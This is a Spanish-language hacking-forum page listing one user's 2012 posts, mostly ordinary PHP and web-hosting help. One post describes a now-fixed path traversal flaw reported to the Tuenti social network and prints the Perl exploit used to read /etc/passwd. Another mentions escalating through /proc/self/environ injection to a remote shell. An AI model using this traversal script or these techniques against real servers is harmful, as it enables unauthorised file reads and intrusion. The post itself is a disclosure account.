elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ... 60
171  Programación / PHP / Re: fclose no me funciona y no me cierra el archivo en: 31 Mayo 2012, 16:51 pm
Es raro, me parece que el problema no es el fopen, que datos contienen el array $apli?
172  Seguridad Informática / Nivel Web / Re: necesito recomendaciones de libros para estudiar sobre WEB en: 31 Mayo 2012, 16:14 pm
Cambien añadiria a esa lista, ajax y json... hoy dia se esta poniendo muy de moda.
También un libro sobre metologias de arquitectura y diseño.
173  Seguridad Informática / Nivel Web / Re: Reportar fallo de seguridad tuenti. en: 31 Mayo 2012, 16:05 pm
Pues encontré la vulnerabilidad probando, estaba analizando como estaba montada tuenti y bueno salio eso.

La gravedad de este tipo de vulnerabilidades es de las mas altas ya que si no es por un sitio puede ser por otro, se podría llegar a inyectar código php desde el user-agent y /proc/self/environ, también desde las sesiones e inyectar una shell remota, mirar archivos de configuración etc...
La verdad una vez encontré la vulnerabilidad simplemente la quise reportar, porque ya sabéis como son estas empresas u.u.

En fin... que no venden de que tienen nuestros datos protegidos, pero vamos cuento chino :S.
174  Programación / PHP / Re: descifrar un archivo codificado (php) Scopbin? Alguien sabe sacarlo? Gracias! en: 31 Mayo 2012, 15:45 pm
jajaja si! es asqueroso, pero bueno eso me pasa al principio... luego ya dejo bien claro que el mantenimiento de código son los 3 primeros meses y solo por errores de programación, actualizaciones de php etc... el resto que lo paguen jajajaj
175  Programación / Desarrollo Web / [Recomendado] Recomendando Host (2012) en: 31 Mayo 2012, 15:25 pm
Como se venia haciendo en estos hilos:


Hacemos otro para este año, y así tenemos información mas nueva.

Formato del post:

Empresa:
País:
Servicios:
Precios:
Ventajas:
Desventajas:
Otros datos relevantes:

URL Oficial (no afiliados o sera eliminada):

Ejemplo:

Citar
Empresa: Hospedajes MundialesHOSPEDAJES MUNDIALES
País: España y latino ametica
Servicios: Hostings, Servidores, VPS y Dominios. HOSTING, SERVIDORES, VPS, DOMINIOS
Precios: Dominios desde 5€, Hosting desde 10€.
Ventajas: Muy buenos precios.
Desventajas: Gran soporte
Otros datos relevantes: Nada relevante.

URL Oficial: http://www.url.com/

Por ultimo también podéis votar cual es el mejor hosting desde aquí.
176  Seguridad Informática / Nivel Web / Re: Reportar fallo de seguridad tuenti. en: 31 Mayo 2012, 14:49 pm
Bueno le pase el error a diminitrix y el contacto con el encargado de seguridad, tambien se lo envié chica de elpais tecnología y ella contacto con tuenti, a las dos horas de hacerlo ya lo arreglaron.

El fallo era un path traversal que te permitía poder leer cualquier fichero del sistema(que tenga permisos claro).

Este era el exploit que utlizaba:

Código:
#!/usr/bin/perl
use IO::Socket::INET;

$host		= "m.tuenti.com";
$attack		= "../../../../../../../etc/passwd";

my $sock 	= IO::Socket::INET->new(	PeerAddr 	=> $host, 
						PeerPort 	=> 'http(80)', 
						Proto 		=> 'tcp'); 
 
print $sock $request	. "GET /?m="	. $attack 	."%00 HTTP/1.1\r\n"
			. "Host: "	. $host		."\r\n"
			. "Connection: Close\r\n\r\n"; 

while($line = <$sock>) {  print $line;  }
177  Programación / Desarrollo Web / Re: Joomla-ftp en: 31 Mayo 2012, 13:39 pm
No siempre hay que subir los ficheros a la raiz del FTP, depende de donde tenga el DocumentRoot tu servidor apache.

Generalmente suele ser en la carpeta www o htdocs.
Un saludo y revisa el httpd.conf y busca el parametro "DocumentRoot".

Un saludo.
178  Programación / Desarrollo Web / Re: [VIDEOTUTORIAL] Sistema de Comentarios, Adobe Dreamweaver, PHP, MySql... en: 31 Mayo 2012, 13:05 pm
Si vas a poner mas hilos con videotutoriales, lo mejores es que los pongas en el mismo hilo editando o bien como respuesta para asi no saturar el foro.

Un saludo!
179  Programación / PHP / Re: descifrar un archivo codificado (php) Scopbin? Alguien sabe sacarlo? Gracias! en: 31 Mayo 2012, 12:31 pm
Todo es descifrable Graphixx, es una lastima...

Sobre todo cuando vendes una aplicación, meten el dedito ellos toquetando código y encima te llaman para solucionar el problema..
180  Programación / PHP / Re: Alguien con experiencia usando EZPDF, por que no genera... en: 30 Mayo 2012, 23:54 pm
Puede que sea la versión de php q tengas en cada servidor.
Páginas: 1 ... 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ... 60
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines